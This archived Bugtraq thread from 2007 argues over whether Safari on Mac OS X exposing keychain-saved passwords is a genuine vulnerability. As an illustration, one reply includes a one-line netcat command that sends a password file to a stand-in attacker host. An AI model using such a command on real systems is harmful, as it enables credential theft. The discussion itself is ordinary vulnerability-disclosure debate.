lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri, 18 May 2007 15:23:26 +0200
From: poplix <poplix@...uasia.org>
To: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords

On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:

> It is also why I don't leave my machine logged in and accessible to  
> other
> users, which appears to be the whole basis of this 'vulnerability'.

this is NOT the basis of the vulnerability. The point is that  
normally a malicious applications running as a nonroot  are not able  
to read keychained passwords.
In this case to steal passwords is sufficent to entice the victim to  
execute a malicious script, that normally it's not enough since  
keychain refuses access to untrusted applications.
This issue exposes keychained password as those are saved in a text  
file: an inexperienced user can loose his password by executing an  
untrusted malicious shell script (ie "cat /home/pop/pass | nc  
steal.com 666")



>
> The whole concept of the keychain, however, is to restrict access  
> to its
> contents to the owner. If you can happily log in as the owner, then  
> you
> have everything they can access, INCLUDING the keychain. If they  
> can't do
> this, you just have some encrypted data. You don't HAVE to store web
> passwords, of course.

keychain asks for password when the owner wants to see his data and  
having access to a computer doesn't mean that you have the login  
password too


> If you are sitting at the machine of a person who has left it  
> logged in
> and they use this feature, then whatever web browser you are using  
> will
> believe you are that person and provide access to the website
> automatically--you don't need to see the password to use it.

and what if you gain a 5 minutes access to a laptop in the middle of  
the desert where internet connection is missing . . .


>
> I'd like to know what Apple were supposed to do to fix this?

i think it's sufficent to untrust the injected code....


>
> It is, after all, YOUR keychain with YOUR passwords that YOU want
> applications to recover when YOU are logged in. Why shouldn't YOU  
> be able
> to access it. If you don't want to use it don't, but if someone has  
> to be
> logged in as you to read it, that sounds about right.

right?? it's like having passwords saved in a text file and 'chmod  
700' it


>
>>> Someone has *ROOT* access to your system REMOTELY over ssh and  
>>> you're
>>> worried that they might be able to retrieve a password from your
> keychain.

rooting a computer is really not the point, it' quite obvious that  
"rooted comp" => "TOTAL compromise"



Let me make a question: what if safari makes loaded password part of  
the html so it's shown when clicking "view page source" ..?? should  
it be considered a vulnerability??


cheers,
-poplix







>
>> Yes, it would be annoying if someone rooted my laptop.  It would be a
>> lot more annoying if they not only rooted my laptop but also  
>> cleaned out
>> my bank account via my browser.
>
> 'Annoying' is the understatement of the millennium.
>
> As far as root access goes, see my comments above regarding key  
> loggers?
>
> With root access they will have your gpg file, they will know what
> processes are running (they will know when you run gpg) and they can
> capture your keystrokes. Is this then a vulnerability of gpg? So  
> much for
> keeping your online banking safe. Even if you memorize the  
> passwords, they
> can still see your keypresses and thereofre empty your bank account.
>
> If someone roots your machine, security is non-existant and trust  
> beyond
> repair. Don't trivialize this by comparing it to a 'might be able  
> to see
> your web passwords' issue, this is disaster incarnate and game over  
> all
> rolled into one!

>
>> It *is* somewhat disturbing that root can so trivially interfere with
>> the guts of someone else's processes.  Normally, root has to do a  
>> lot of
>> work to do that.
>
> With great power comes great responsibility, which is precisely why  
> Macs
> have the root login disabled and require a user designated as
> 'Administrator' to authenticate themself whenever system files are
> modified or installed. Other users are created as non-administrator  
> and
> remote login is blocked by the firewall. The chances of anyone  
> actually
> logging in remotely as root on a normal Mac are zero as you, while
> administrator, would have to specifically enable all of this. This  
> is why
> Apple warn you not to do it.
>
>>>>  a different non-root user on the console can do it too
>>> Which again restricts this vunerability (as previously mentioned) to
> an
>>> attacker who happens to be sitting in front of your machine(!)
>
>> Did you read the bit where I speculated about setuid applications?
>
> Yes, but again if you can get this far you either have the person's
> identity or root access (bad or hopeless situation respectively). Why
> worry incessantly about things that you stored in the keychain being
> accessed when someone can access everything you own.
>
> Should the keychain refuse to divulge its contents to a person
> authenticated as the owner?
>
> Is the answer to remove the keychain and watch as people revert to  
> storing
> their passwords unencrypted in stickies, or text files on their  
> desktop?
>
> You normally have to come up with a feasible attack vector for  
> something
> to be a vulnerability, this seems far too early to be notifying the
> vendor.
>
> Saving passwords on any web browser is a lousy idea from a security
> perspective. However, people don't like security, they like  
> convenience.
> The only real fix here is perhaps a disclaimer message advising  
> people not
> to store important passwords for websites in the browser in the first
> place. But lets face reality, even if the did would it stop people  
> doing
> it?
>





>> --
>> David Cantrell
>
> --
> Graham Coles
>
>
>
> The Logic Group Enterprises Limited
> Logic House, Waterfront Business Park, Fleet Road, Fleet,  
> Hampshire, GU51 3SB, UK
> Registered in England. Registered No. 2609323

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ